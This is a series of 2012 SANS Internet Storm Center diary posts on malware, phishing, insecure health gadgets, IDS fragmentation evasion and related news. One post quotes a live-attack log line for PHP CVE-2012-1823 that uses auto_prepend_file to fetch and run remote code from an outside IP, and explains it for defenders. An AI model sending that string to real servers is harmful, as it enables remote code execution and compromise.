Published: 2012-05-31

Why Flame is Lame

We have gotten a number of submissions asking about "Flame", the malware that was spotted targeting systems in a number of arab countries. According to existing write-ups, the malware is about 20 MB in size, and consists of a number of binary modules that are held together by a duct tape script written in LUA. A good part of the size of the malware is associated with its LUA interpreter.

If you ever find something like that using perl instead of LUA... maybe I did it. I love to tie together various existing binaries using perl duct tape. However, I am not writing malware... and any serious commercial malware writing company would have probably fired me after seeing this approach. Using LUA would probably not fair much better. "Real" malware is typically plugged together from various modules, but compiled into one compact binary. Pulling up a random Spyeye description shows that it is only 70kBytes large, and retails for $500. Whatever government contractor put together "Flame" probably charged a lot more then that. Like with most IT needs: If you run some government malware supply department, think going COTS.

Of course, "Flame" is different because it appears to be "government sponsored". Get over it. Did you know governments hire spies? People who get paid big bucks (I hope) to do what can generally be described as "evil and illegal stuff". They actually do that for pretty much as long as governments exist, and McAfee may even have a signature for it.

We are getting a lot of requests for hints on how to detect that your are infected with Flame. Short answer: If you got enough free time on your hand to look for "Flame", you are doing something right. Take a vacation. More likely then not, your time is better spent looking for malware in general. In the end, it doesn't matter that much why someone is infecting you with the malware d'jour. The Important part is how they got in. They pretty much all use the same pool of vulnerabilities, and similar exfiltration techniques. Flame is actually pretty lame when it comes to exfiltrating data as it uses odd user-agent strings. Instead of looking for Flame: Setup a system to whitelist user-agents. That way, you may find some malware that actually matters, and if you happen to be infected with Flame, you will see that too. 

But you say: Hey! I can't whitelist user-agents! Sorry: you already lost. On a good note: scrap that backup system. All your important data is already safely backed up in various government vaults. (recovery is a pain though... )

Sorry for the rant. But had to get it out of the system. Oh... and in case you are still worried... the Iranian CERT got a Flame removal tool [2]. Just apply that. I am sure it is all safe and such.

[1] http://www.symantec.com/security_response/writeup.jsp?docid=2010-020216-0135-99
[2] http://certcc.ir/index.php?name=news&file=article&sid=1894

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-05-31

NASA Man-in-the-Middle Attack: Why you should use proper SSL Certificates

A posting to pastebin, by a group that calls itself "Cyber Warrior Team from Iran", claims to have breached a NASA website via a "Man in the Middle" attack. The announcement is a bit hard to read due to the broken english, but here is how I parse the post and the associated screenshot:

The "Cyber Warrior Team" used a tool to scan NASA websites for SSL misconfigurations. They came across a site that used an invalid, likely self signed or expired certificate. Users visiting this web site would be used to seeing a certificate warning. This made it a lot easier to launch a man in the middle attack. In addition, the login form on the index page isn't using SSL, making it possible to intercept and modify it unnoticed.

Once the attacker set up the man in the middle attack, they were able to collect username and passwords.

Based on this interpretation, the lesson should be to stop using self signed or invalid certificates for "obscure" internal web sites. I have frequently seen the argument that for an internal web site "it is not important" or "too expensive" or "too complex" to setup a valid certificate. SSL isn't doing much for you if the certificate is not valid. The encryption provided by SSL only works if the authentication works as well. Otherwise, you never know if the key you negotiated was negotiated with the right party.

And of course, the log in form on the index page should be delivered via SSL as well. Even if the form is submitted via SSL, it is subject to tampering if it is delivered via http vs. https. 

good old "OWASP Top 10" style lessons, but sadly, we still need to repeat them again and again. For a nice test to see if SSL is configured right on your site, see ssllabs.com .

Also, in more complex environments, you need to make sure that all of your SSL certificates are in sync. We recently updated SSL certificates, and forgot to update the one used by our IPv6 web server. (thnx Kees for pointing that out to us). 

[1] http://pastebin.com/MFPMGZ4Z

[2] https://www.ssllabs.com

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-05-31

SCADA@Home: Your health is no secret no more!

One of my interest recently has been what I call "SCADA@Home". I use this term to refer to all the Internet connected devices we surround ourself with. Some may also call it "the Internet of devices". In particular for home use, these devices are built to be cheap and simple, which hardly ever includes "secure". Today, I want to focus on a particular set of gadgets: Healthcare sensors. 

Like SCADA@Home in general, this part of the market exploded over the last year. Internet connected scales, blood pressure monitors, glucose measurement devices, thermometers and activity monitors can all be purchased for not too much money.I personally consider them "gadgets", but they certainly have some serious health care uses. 

I will not mention any manufacturer names here, and anonymized some of the "dumps". The selection of devices I have access to is limited and random. I do not want to create the appearance that these devices are worse then their competitors. Given the consistent security failures I do consider them pretty much all equivalent. Vendors have been notified.

There are two areas that appear to be particularly noteworthy:

- Failure to use SSL: Many of the devices I looked at did not use SSL to transmit data to the server. In some cases, the web site used to retrieve the data had an SSL option, but it was outright difficult to use it. (OWASP Top 10: Insufficent Transport Layer Protection)

- Authentication Flaws: The device does use weak authentication methods, like a serial number. (OWASP Top 10: Broken Authentication and Session Management)

First of all, there are typically two HTTP connections involved: The first connection is used by the device to report the data to the server, in some cases, the device may retrieve settings from the server. The second HTTP connection is from the users browser to the manufacturers website. This connection is used to review the data. The data submission uses typically a web service. The web sites themselves tend to be Ajax/Web 2.0 heavy with the associated use of web services.

The device is typically configured by connecting it via USB to a PC or to a Smartphone. The smart phone or desktop software would provide a useable interface to configure passwords, a problem that is common for example among bluetooth headsets which don't have this option. Most of the time, the data is not sent from the device itself, but from a smartphone or desktop application. The device uploads data to the "PC", then the PC submits the data to the web service. This should provide access to the SSL libraries that are available on the PC. In  a few cases, the device sends data directly via WiFi. In the examples I have seen, these devices still use a USB connection to configure the device from a PC.

Example 1: "Step Counter" / "Activity Monitor"

The first example is an "activity monitor". Essentially a fancy step counter. The device clips on your belt, and sends data to a base station via an unspecified wireless protocol. The base station also doubles as a charger. The user has no direct control over when the device uploads data, but it happens frequently as long as the device is in range of the base station. Here is a sample "POST":

POST /device/tracker/uploadData HTTP/1.1
Host: client.xxx.com:80
Content-Length: 163
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=1A2E693AD5B28F4F153EE9D23B9237C8
Connection: keep-alive

beaconType=standard&clientMode=standard&clientId=870B2195-xxxx-4F90-xxxx-67CxxxC8xxxx&clientVersion=1.2&os=Mac OS X 10.7.4 (Intel%2080486%10)

The session ID appears to be inconsequential, and the only identifier is the client ID. Part of the request was obfuscated with "xxx" to hide the identity of the manufacturer. The response to this request:

<?xml version="1.0" ?> 
<xxxClient version="1.0"> 
<response host="client.xxx.com" 
          port="80" secure="false"></response>
<device type="tracker" pingInterval="4000" action="command" >
<remoteOps errorHandler="executeTillError" responder="respondNoError"> 
<remoteOp encrypted="false">

It is interesting how some of the references in this response suggest that there may be an https option. For example in line 5: port="80" and secure="false" may indicate an HTTPS option. 

Example 2: Blood Pressure Sensor

The blood pressure sensor connects to a smart phone, and the smart phone will then collect the data and communicate with a web service. The authentication looks reasonable in this case. First, the smart phone app sends an authentication request to the web service:

GET /cgi-bin/session?action=new&auth=jullrich@sans.edu&hash=xxxxx& 
  duration=60&apiver=6&appname=wiscale&apppfm=ios&appliver=307 HTTP/1.1

The "hash" appears to be derived from the user provided password and a nonce that was sent in response to a prior request. I wasn't able to directly work out how the hash is calculated (which is a good sign) and assume it is a "Digest like" algorithm. Based on the format of the hash, MD5 is used as a hashing algorithm, which isn't great, but I will let it pass in this case.

All this still happens in clear text, and nothing but the password is encrypted. The server will return a session ID, that is used for authentication going forward. The blood pressure data itself is transmitted in the clear, using proprietary units, but I assume once you have a range of samples, it is easy to derive them:

action=store&sessionid=xxxx-4fc6c74e-0affade3&data=* TIME unixtime 1338427213
* ID mac,hard,soft,model
02-00-00-00-xx-01,0003000B,17,Blood Pressure Monitor BP
* ACCOUNT account,userid
* BATTERY vp,vps,rint,battery %25
* RESULT cause,sys,dia,bpm
* PULSE pressure,energy,centroid,timestamp,amplitude

(some values are again replaced with "x" . In case you wonder... BP was a bit high but ok ;-)

In my case, the device sent a total of 12 historic values, in addition to the last measured value. So far, I only had taken 12 measurements with the device.

Associated web sites

The manufacturers of both devices offer web sites to review the data. Both use SSL to authenticate, but later bounce you to an HTTP site, adding the possibility of a "firesheep" style session hijack attack. For the blood pressure website, you may manually enter "https" and it will "stick". The activity monitor has an HTTPS website, but all links will point you back to HTTP. A third device, a scale, which I am not discussing in more detail here as it is very much like the blood pressure monitor, suffers from the same problems.

A quick summary of the results:

  Device Authentication Data Encryption Website Auth SSL Website Data SSL
Blood Pressure Sensor  encrypted password none login only only if user forced
Activity Monitor device serial number none login only hard for user to force

 I have no idea if HIPAA or other regulation would apply to data and devices like this. Like I said, these are "gadgets" you would find in a home, not in a doctor's office. I also tested a scale that was very much like the blood pressure monitor.  It used decent authentication but no SSL. If you have any devices like this, let me know if you know how they authenticate and/or encrypt.

So how bad is this? I doubt anybody will be seriously harmed by any of these flaws. This is not like the wireless insulin pumps or infusion drips that have been demonstrated to be weak in the past. However, it does show a general disrespect for the privacy of the user's data, and an unwillingness to fix pretty easy to fix problems.

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-05-30

It's Phishing Season! In fact, it's ALWAYS Phishing Season!

It's always great to hear from our readers, we just got this note in from Tom on a phish that he recently encountered:

One of my followers on Twitter (whose account was likely hacked or fell victim to this scam) sent me the following DM:

hilarious pic! bit.ly/KIbUqq

That bit.ly URL redirects to:

That site is clearly impersonating the Twitter.com site, and attempts to trick users into typing in their username and password.  As of this writing (May 30, 2012 12:18pm EDT), the site is still available.

The whois record shows it as registered to "XIN NET TECHNOLOGY CORPORATION" in Shanghai, China.  The whois record also have an HTML "script" tag in it, which may be an attempt to XSS users using web-based WHOIS services (though I did not try loading the JS file to find out).

While I've certainly seen reply spam on Twitter, I don't recall ever seeing this type of DM spam leading to phishing before.  I thought that you guys might find it interesting!

I sent a message using Twitter's online support form, and I also submitted the URL to Google's SafeBrowsing list.


This was just too good an example to pass up writing about.  Things to watch out for:

  • Any link you're asked to click on, in any context is a risk - READ THE UNDERLYING LINK to verify that you're going where you think you are.
  • If it's a shortened link (bit.ly or whatever), check it with a sacrificial VM or from a sandboxed browser that you trust is actually partiitioned and "safe"
  • Before you click the link - READ THE LINK AGAIN - the "vv" instead of a "w" character in twitter is a nice touch, easy to miss
  • Finally, before clicking the link, DON'T CLICK THE LINK.  Cut and paste it into your browser rather than clicking it directly.

If you've got any other pointers, or if I've missed anything, please use our comment to .. well... comment !


Rob VandenBrink


Published: 2012-05-30

What's in Your Lab?

The discussion about labs got me thinking about what we all have in our personal labs.  The "What's in your lab?" question is a standard one that I ask in interviews, it says a lot about a person's interests and commitment to those interests.

I just revamped my lab (thanks to my local "cheap servers off lease" company and eBay).  Previously I was able to downsize and host my entire lab on my laptop with a farm of virtual machine and a fleet of external USB drives, but as I ramp up my requirements for permanent servers (an MS Project server, an SCP server, a web honeypot and an army of permanent, cpu and memory hungry pentest VMs), I had to put some permanent hosts back in.

So to host all this, I put in 3 ESX servers with 20 cores altogether (thanks eBay!).  I picked up a 4 gig fiber channel switch and 4 HBAs for a song, also on eBay.  I had an older XEON server with lots of drive bays, so I filled it up with 1TB SATA drives and a SATA raid controller - with a fiber channel HBA and Openfiler, I've now got a decent Fiber Channel SAN (with iSCSI and NFS thrown in for good measure).  Add a decent switch and firewall for VLAN support and network segmentation, and this starts to look a whole lot like something useful !!  The goal was that after it's all bolted together, I can do almost anything in the lab without physically being there.

I still keep lots of my lab on the laptop VM farm - for instance my Dynamips servers for WAN simulation are all still local, so are a few Linux VMs that I use for coding in one language or another for instance.

Enough about my lab - what's in your lab?  Have you found a neat, cheap way of filling a lab need you think others might benefit from?  Do you host your lab on a laptop for convenience, or do you have a rack in your basement (or at work)?  Please use our comment form and let us know!

Rob VandenBrink


Published: 2012-05-30

Too Big to Fail / Too Big to Learn?

There's an interesting trend that I've been noticing in datacenters over the last few years.  The pendulum has swung towards infrastructure that is getting too expensive to replicate in a test environment. 

In years past, there may have been a chassis switch and a number of routers.  Essentially these would run the same operating system with very similar features that smaller, less expensive units from the same vendor might run.  The servers would run Windows, Linux or some other OS, running on physical or virtual platforms.  Even with virtualization, this was all easy to set up in a lab.

These days though, on the server side we're now seeing more 10Gbps networking, FCoE (Fiber Channel over Ethernet), and more blade type servers.  These all run into larger dollars - not insurmountable for a business, as often last year's blade chassis can be used for testing and staging.  However, all of this is generally out of the reach of someone who's putting their own lab together.

On the networking side things are much more skewed.  In many organizations today's core networks are nothing like last year's network.  We're seeing way more 10Gbps switches, both in the core and at top of rack in datacenters.  In most cases, these switches run completely different operating systems than we've seen in the past (though the CLI often looks similar).

As mentioned previously , Fiber Channel over Ethernet is being seen more often - as the name implies, FCoE shares more with Fiber Channel than with Ethernet.  Routers are still doing the core routing services on the same OS that we've seen in the past, but we're also seeing lots more private MPLS implementations than before.

Storage as always is a one-off in the datacenter.  Almost nobody has a spare enterprise SAN to play with, though it's becoming more common to have Fiber Channel switches in a corporate lab.  Not to mention the proliferation of Load Balancers, Web Application Firewalls and other specialized one-off infrastructure gear that are becoming much more common these days than in the past.

So why is this on the ISC page today?  Because in combination, this adds up to a few negative things:

  • Especially on the networking and storage side, the costs involved mean that it's becoming very difficult to truly test changes to the production environment before implementation.  So changes are planned based on the product documentation, and perhaps input from the vendor technical support group.  In years past, the change would have been tested in advance and likely would have gone live the first time.  What we're seeing more frequently now is testing during the change window, and often it will take several change windows to "get it right".
  • From a security point of view, this means that organizations are becoming much more likely to NOT keep their most critical infrastructure up to date.  From a Manager's point of view, change equals risk.  And any changes to the core components now can affect EVERYTHING - from traditional server and workstation apps to storage to voice systems.
  • At the other end of the spectrum, while you can still cruise ebay and put together a killer lab for yourself, it's just not possible to put some of these more expensive but common datacenter components into a personal lab

What really comes out of this is that without a test environment, it becomes incredibly difficult to become a true expert in these new technologies. As we make our infrastructure too big to fail, it effectively becomes too big to learn.  To become an expert you either need to work for the vendor, or you need to be a consultant with large clients and a good lab.  This makes any troubleshooting more difficult (making managers even more change-adverse)

What do you think?  Have I missed any important points, or am I off base?  Please use our comment for for feedback !

Rob VandenBrink


Published: 2012-05-29

Speeding up the Web and your IDS / Firewall

HTTP as a protocol has done pretty well so far. Initially intended to be a delivery medium for scientific data and documents, HTTP has become "The Web / The Internet" for most people and the content being transmitted via HTTP has changed a lot from its initial days.

There are two limitations in particular that some modern proposals attempt to overcome:

- request based nature of HTTP: The server will not be able to notify the client of new data
- latency: HTTP uses pretty extensive headers and isn't exactly latency friendly.

Google in particular has put out a number of proposals to address some of these challenges:

1 - Sending HTTP request data on SYN

The TCP RFC always allowed to send data on SYN, but nobody really attempted to do it... ever. A standard HTTP request is typically a couple of hundred bytes in size. It is unlikely that it will get fragmented, and it would make sense to send it as part of the SYN packet, removing the overhead (in particular latency) caused by properly establishing the TCP connection first. Establishing the full 3 way handshake will easily add 100ms to a new connection on a well connected server.

However, if you have ever done any kind of IDS work, the idea of sending data on SYN probably doesn't sound all that comforting, and I would assume that many firewalls/IPSs/IDSs will not allow data on SYN to pass unnoticed.

2 - Compressing HTTP headers / SPDY

Most browsers will support compressing the HTTP body. However, they do not support compressing HTTP headers right now. A proposal to frame HTTP requests called "SPDY" (pronounce speedy), among other features, includes the ability to compress HTTP headers. This should be in particular interesting for asymmetric internet connections with little upstream bandwidth.

SPDY in itself is probably worth a future diary as it provides a lot more then just compressed headers. It is implemented (but turned off by default) in recent versions of Chrome and Firefox). Twitter starts using SPDY so does Google on select pages. Interestingly, SPDY is currently only used over SSL. 

3 - Websockets

Websockets (in addition to SPDY) are an attempt to allow the web server to notify the client about new events. Think about web mail or instant messenger software notifying you of a new message. The web sockets specification has had a rough start, but got finalized last November. It starts to see some use on social networking websites.

4 - Speed + Mobility

Microsoft came up with its own proposal: Speed + Mobility . So far, I am not aware of any implementations of it, and it may be pre-empted by SPDY as it directly competes with SPDY.  

Looking further ahead: All of this (SPDY, S+M...) may ultimately become HTTP 2.0. HTTP 2.0 is specifically going to address performance issues, and SPDY as well as S+M are trying to address these.

[1] http://googlecode.blogspot.com/2012/01/lets-make-tcp-faster.html
[2] http://dev.chromium.org/spdy/spdy-whitepaper
[3] http://blogs.msdn.com/b/interoperability/archive/2012/03/25/speed-and-mobility-an-approach-for-http-2-0-to-make-mobile-apps-and-the-web-faster.aspx


Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-05-27

PHP vulnerability CVE-2012-1823 being exploited in the wild

Reader Bob detected in his webserver the following string in the access log of his web server:

bas1-richmondhill34-1177669777.dsl.bell.ca - - [24/May/2012:12:17:49 -0700] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 404 2890 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

This string is an attempt to exploit the PHP vulnerability CVE-2012-1823 with the remote execution variant. Let's see what means each of the options invoked:

  • safe_mode=off: PHP disables the capacity of checking if the if the owner of the current script matches the owner of the file to be operated by a file funcionality. This directive has been deprecated on PHP 5.3.0 tree and removed on PHP 5.4.0 tree.
  • disable_functions=null: No function is disabled from the whole amount contained within PHP. This means that insecure functions are available like proc_open, exec, passthru, curl_exec, system, popen, curl_multi_exec and shell_exec. For more information on this functions, please check the PHP manual.
  • allow_url_fopen=on: This directive allows PHP to open files located in http or ftp locations and operate them as a normal file descriptor.
  • allow_url_include=on:This directive allows to include additional PHP code located in a http or ftp URL into the PHP file before being processed and executed.
  • auto_prepend_file= This directive includes the PHP code located in and execute it before the code inside index.php.

You can prevent this by using the latest stable PHP version located at the downloads page. If you are using windows, please be careful because you can be affected by the CVE-2012-2376. For more information regarding remediation on this vulnerability, please check my previous diary about it. 

Have you seen such logs in your access.log webserver file? We want to hear about it. Let us know!

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
e-mail:msantand at isc dot sans dot org


Published: 2012-05-26

New e-mail scam targeting Colombian Internet users: This time claiming to be from the Transport authority

 Scams keep coming! This time there were many uses from all across the country targeted by this e-mail scam claiming to be a notice of traffic ticket from the Transport Authority.


Initial e-mail scam

Two links were provided in the e-mail: http://www.mcc-instrumentation.com/videos/Ver_Documento_ID_23452345212234_VER_Cod_2345234723497.html and http://www.la-cloture-electrique.fr/upload/Ver_Documento_ID_23472893475987980798072344_VER_Cod_2234523345234723497.html. Both of them redirects to the file Aviso-Multas_DOC.exe, with MD5 d554f70ce28470350269d8e6778127e3. Once executed, it downloads the following files:

File MD5
atu.exe 1466d43e8ae62af74a83eb81094c7c25
ky.exe 974f4ceaca680fe4572a0e050fc851db
wrm.exe e63c7844a75df064d78f1894e6f673bb

The exe files read all the TCP/IP registry parameters. After that, it connects to some servers to report to some kind of a botnet:

Botnet Report

One of the reports seems to be sent by mail, because the php script where the program reports gets a warning:

As of today, there are other servers that have removed the offending PHP scripts sending a 404 error to the program. No further action is taken by the program and it becomes resident by creating entries on HKLM\Software\Microsoft\Windows\Currentversion\Run

Have you seen this kind of packets in your network? Let us know!

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
e-mail:msantand at isc dot sans dot org


Published: 2012-05-25

Technical Analysis of Flash Player CVE-2012-0779

Microsoft Malware Protection Center (MMPC) posted a technical analysis of malware targeting an Adobe Flash Player (CVE-2012-0779) vulnerability to which Adobe released a critical patch update earlier this month (diary posted here). The technical analysis shows the process how the infection occurs when a malicious document is open. The technical analysis is posted here. Get the latest version of Flash Player here (Flash Player and earlier is vulnerable).

[1] http://isc.sans.edu/diary/Adobe+Security+Flash+Update/13129
[2] http://blogs.technet.com/b/mmpc/archive/2012/05/24/a-technical-analysis-of-adobe-flash-player-cve-2012-0779-vulnerability.aspx
[3] http://get.adobe.com/flashplayer/


Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Published: 2012-05-25

Google Publish Transparency Report

Google just released its transparency report disclosing data dating from July 2011. As an example, the report shows the number of requests it received over the past month; the number URL removal requests (1,255,402), by targeted domains (24,374), by copyright owners (1,314) and by reporting organizations (1,099). The full report is available here. A blog posted by Google Fred von Lohmann, Senior Copyright Counsel is available here.

[1] http://www.google.com/transparencyreport/removals/copyright/
[2] http://googleblog.blogspot.ca/2012/05/transparency-for-copyright-removals-in.html


Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Published: 2012-05-24

ISC Feature of the Week: Country Report


As promised in the Data/Reports Feature Diary, this week we will cover the Country Report page at https://isc.sans.edu/countryreport.html in detail. The Worldmap graphic on this page is used in numerous spots around the site and links back here in most cases.


Worldmap - https://isc.sans.edu/countryreport.html#worldmap

  • Summary graph color coded with legend by port
  • Grouped and graphed by percentage (%)

Country Statistics - https://isc.sans.edu/countryreport.html#statistics

  • Link to Country Report page which individually lists countries,  as well as other features worthy of its own feature.
  • To view specific country summary data, select a Country name from the drop-down and click Submit.
  • Summary table of country name, country flag, additional information and data submitted through our sensor

How to read this table / FAQs - https://isc.sans.edu/countryreport.html#faq

  • Detailed explanation of the Statistics table above and where certain information is pulled from.


Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form
Adam Swanger, Web Developer (GWEB, GWAPT)
Internet Storm Center https://isc.sans.edu


Published: 2012-05-23

Problems with MS12-035 affecting XP, SBS and Windows 2003?

There is a fair amount of chatter in Microsoft forums regarding problems cause by recent Microsoft patches.  [1][2][3][4] From what I can gather users are repeatedly being prompted to reinstall 3 older .NET patches on some OS distributions.   It looks like MS12-035 was intended to replaced 3 older patches MS11-044, MS11-078 and MS12-016 and something isn't quite right.   You may want to hold of deploying that patch until we know more.  

Thanks to Dave (ToyMaster) for the heads up and hard work researching the issue.  I think he has a blog post pending [5] that will explain the issue in more detail.   I'll keep you updated here as I learn more.  

Do you have any more information for us?   Leave me a comment or contact us via the handler contact page.

Mark Baggett




[1] http://social.technet.microsoft.com/Forums/en-US/smallbusinessserver/thread/2f0bbb7d-fc28-4c32-bf63-54cf5a6615d2

[2] http://social.technet.microsoft.com/Forums/en-US/itproxpsp/thread/c7934c6f-0acd-4793-b222-e840eb61b3a6

[3] http://msmvps.com/blogs/bradley/archive/2012/05/21/hang-loose-until-someone-in-redmond-wakes-up-and-fixes-microsoft-update.aspx

[4] http://answers.microsoft.com/en-us/windows/forum/windows_xp-windows_update/kb2633880-kb2518864-kb2572073-installed-but-not/e6ecef19-5551-4925-9d74-43813ba04d3a

[5] http://home.comcast.net/~itdave/site/





Published: 2012-05-23

IP Fragmentation Attacks

Using overlapping IP fragmentation to avoid detection by an IDS has been around for a long time.  We know how to solve this problem.  The best option in my opinion is to use a tool such as OpenBSD's pf packet filter [1] to scrub our packets eliminating all the fragments (pfSense [2] makes this easy to deploy).  However, this option is not without its caveats [3].  You could simply configure your IDS to alert for and/or drop any overlapping fragmented packets.   Overlapping fragments should not exist in normal traffic.   Another option is to configure the IDS to reassemble the packets the same way the endpoint reassembles them.  Snort's frag3 preprocessor will reassemble the packets based on the OS of the target IP and successfully detect any fragmented attacks that would work against a given target host.  Problem solved right?  There is another opportunity for attackers to use differences in the fragmentation reassembly engines to his advantage.  What happens when the IDS analyst turns to their full packet capture to understand the attack?  If the analyst's tools reassemble the packets differently than the target OS the analyst may incorrectly dismiss the TRUE positive as a FALSE positive.

Today, with the low cost of disk drives, more and more organizations can afford to maintain full packet captures of everything that goes in and out of their network.  If you are not running full packet capture, you really should look into it.  I don't think there is a better way to understand attacks on your network then having full packet captures.  One great option is to install Daemonlogger [4] on the Linux/BSD distribution of your choice.  This was an option I used for many years.  Today, I use the Security Onion distro [5] by Doug Burks. If you want a free IDS with full packet capture that you can quickly and easily deploy, Security Onion is a great option.

Once you have the full packet capture, how do you find the fragmented attacks?  You could try reassembling them with Wireshark.  Let's check that out and see what happens.  Security Onion has scapy installed so let's use that to generate some overlapping fragments.  I'll generate the classic overlapped fragment pattern illustrated by the paper “Active Mapping: Resisting NIDS Evasion Without Altering Traffic” by Umesh Shankar and Vern Paxson [6] and then further explained in “Target Based Fragmentation Assembly” by Judy Novak [7].

Now open up our "fragmentpattern.pcap" with Wireshark and see what we see.

If you compare the reassembled pattern to what was outlined in Judy Novak's paper you will recognize the BSD reassembly pattern.  So you will see all the attack packets that are targeted at a host using the BSD reassembly methodology, but not ones targeted at other reassembly policies (First, Last, BSD-Right and Linux).   You would not see overlapping fragmentation attacks targeted at both Windows and Linux.  However, Security Onion now (as of build 20120518 [8] ) has a Python script called "reassembler.py". If you provide reassembler.py with a pcap that contains fragments, it will reassemble the packets using each of the 5 reassembly engines and show you the result.  It will even write the 5 versions of the packets to disk so you can examine binary payloads as the target OS would see them.  Let's see what reassembler does with the fragmented packets we just created.


Now you can see exactly what the IDS saw and make the correct decision when analyzing your packet captures.   If using the Onion isn't an option for you, you can download reassembler.py direct from my SVN  http://baggett-scripts.googlecode.com/svn/trunk/reassembler/.   How do you handle this?   What are some other ways to solve this problem?  Leave a comment.

Security Onion creator Doug Burks and I are teaching together in Augusta GA June 11th - 16th.  Come take "SEC503 Intrusion Detection In-Depth" from Doug or "SEC560 Network Penetration Testing and Ethical Hacking" from me BOOTCAMP style!  Sign up today! [9]

Mark Baggett



[1] http://www.freebsd.org/doc/handbook/firewalls-pf.html
[2] http://www.pfsense.org/
[3] http://sysadminadventures.wordpress.com/2010/11/02/why-pfsense-is-not-production-ready/
[4] http://www.snort.org/snort-downloads/additional-downloads
[5] http://securityonion.blogspot.com/
[6] http://www.icir.org/vern/papers/activemap-oak03.pdf
[7] http://www.snort.org/assets/165/target_based_frag.pdf
[8] http://securityonion.blogspot.com/2012/05/security-onion-20120518-now-available.html
[9] http://www.sans.org/community/event/sec560-augusta-jun-2012




Published: 2012-05-22

When factors collapse and two factor authentication becomes one.

The benefits of two factor authentication are pretty much Security 101 material. And we are also told, that two factors are more then "password 1" and "password 2". RSA for example, one of the leaders of two factor authentication, defines this pretty nicely:

"Two-factor authentication is also called strong authentication. It is defined as two out of the following three proofs:

  • Something known, like a password,
  • Something possessed, like your ATM card, or
  • Something unique about your appearance or person, like a fingerprint."

There are a number of ways these factors can collapse. For example, for a one-time password token, the user typically needs to remember a password, or a PIN, as second factor. Users tend to write this password on the pack of the token, collapsing the factors. Now you only need to "possess" the token. In a more elaborate case, I ran into a user who had a webcam at home pointed at the token (he always forgot his token at home). Now all you needed to access the system was "something known" (the URL of the webcam and the password).

Tokens themselves pose a different threat to collapse factors. Tokens operate by calculating a hash of an internal secret ("seed") and either a timestamp or a counter. You may not know the seed, but someone else may. This issue has come up with the recent breach of RSA that may have lead to the leak of these seeds. The "seed" should not be directly related to the serial number printed on the device, but in the RSA case, it was alleged that the stolen data included some form of lookup table like that.  RSA's algorithm to calculate the token value had already been leaked years earlier. Of course in particular for software token, the algorithm can be reverse engineered. Evidently, someone now managed to do just that, and to be able to retrieve the seed value from the software token  [3]. Physical tokens are usually hardened to prevent someone from stealing the seed value, in particular to do so undetected. In many ways, a "token" is a secret that you don't know. 

What should you do about all this?

- know the limitations of two factor authentication and educate your users. They aren't the end of password attacks, but the make them substantially harder.
- stolen or lost tokens need to be deactivated immediately. This includes soft tokens. Soft tokens need to be invalidated even if the device is later recovered.
- If you are auditing an organization, watch for "collapsed factors"
- Some two factor authentication systems, like for example the standard based time based and HMAC based one time password systems [4][5] usually expose the seed during setup. It is also typically rather easy to "clone" tokens in these settings (e.g. Google Authenticator uses TOTP). You may want to set up the token for users, or at least ensure that the seed is transmitted and entered securely.

[1] http://www.rsa.com/glossary/default.asp?id=1056
[2] http://www.theregister.co.uk/2011/03/18/rsa_breach_leaks_securid_data/
[3] http://arstechnica.com/security/2012/05/rsa-securid-software-token-cloning-attack/
[4] http://tools.ietf.org/html/rfc6238
[5] http://tools.ietf.org/html/rfc4226


Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-05-22

The "Do Not Track" header

A recent proposal, supported by many current web browsers, suggests the addition of a "Do Not Track" (DNT) header to HTTP requests [1]. If a browser sends this header with a value of "1", it indicates that the user would not like to be "tracked" by third party advertisers. The server may include a DNT header of its own in responses to indicate that it does comply with the do-not-track proposal.

The proposal focuses on third party advertisements. It does suggest retention periods for first parties (2 weeks for all logs, up to 6 months for security relevant logs) to remain some compatibility with compliance standards that require specific logging schemes and retention times.

The biggest problem with this standard, aside from user awareness, is the fact that this is all voluntary. There is no technical means to enforce that  a web site treats your data in accordance with the DNT header. Some legal protections are in the works, but as usual, they will probably only apply to legitimate advertisers who are likely going to comply. DNT will only matter if enough advertisers sign up to respect it. It is kind of like the "robots.txt" file, and could even be abused for user tracking as it will make browsers even more "unique" to allow them to be identified without the use of cookies or other tracking mechanisms. [3]

If you are concerned about tracking by third party sites, you need to not load content from third party sites, in particular ads and additional trackers (like cookies). Various ad blockers will help with this. Of course at the same time, you are violating the implicit contract that keeps many sites afloat: For letting you watch my content for free, my advertisers will track you. 

At the same time, users overwhelmingly don't appear to care much about privacy.  The "Do Not Track" header is usually not enabled by default. I don't think many users know about it, or how to enable it. The URL listed below has instructions on how to enable it, and will tell you if it is enabled in your browser. On the ISC website, the number of users with DNT enabled went from about 3.4% to 5.1%, which shows that while DNT adoption in our more technical readership is picking up, it is still rather low.

As far as this website is concerned: We do continuously try to refine our site to "leak less" of our visitors information. For example, we recently switched to a privacy enhanced social sharing toolbar. Our site is also using https for most parts. Aside from the obvious encryption advantage, this will prevent referrer headers from being included if you are clicking on a not-https link on our site.

Our biggest issue right now is the use of Google Analytics, and Google Ads in a couple spots, but I am reviewing these, and am looking for a replacement for Google analytics. Over time, I hope to have less and less third party content on the site that could be used to track visitors wether or not the have the "Do Not Track" feature enabled. 

[1] http://donottrack.us/
[2] http://tools.ietf.org/id/draft-mayer-do-not-track-00.txt
[3] https://panopticlick.eff.org/

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-05-22

nmap 6 released

nmap 6 was released earlier today, which is a major upgrade to the old version of nmap. One feature that excites me in particular is "full IPv6 support", including OS fingerprinting. 

In order to efficiently scan IPv6 networks, nmap added multicast requests to enumerate live hosts on a network.

For more details, see http://nmap.org/6

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


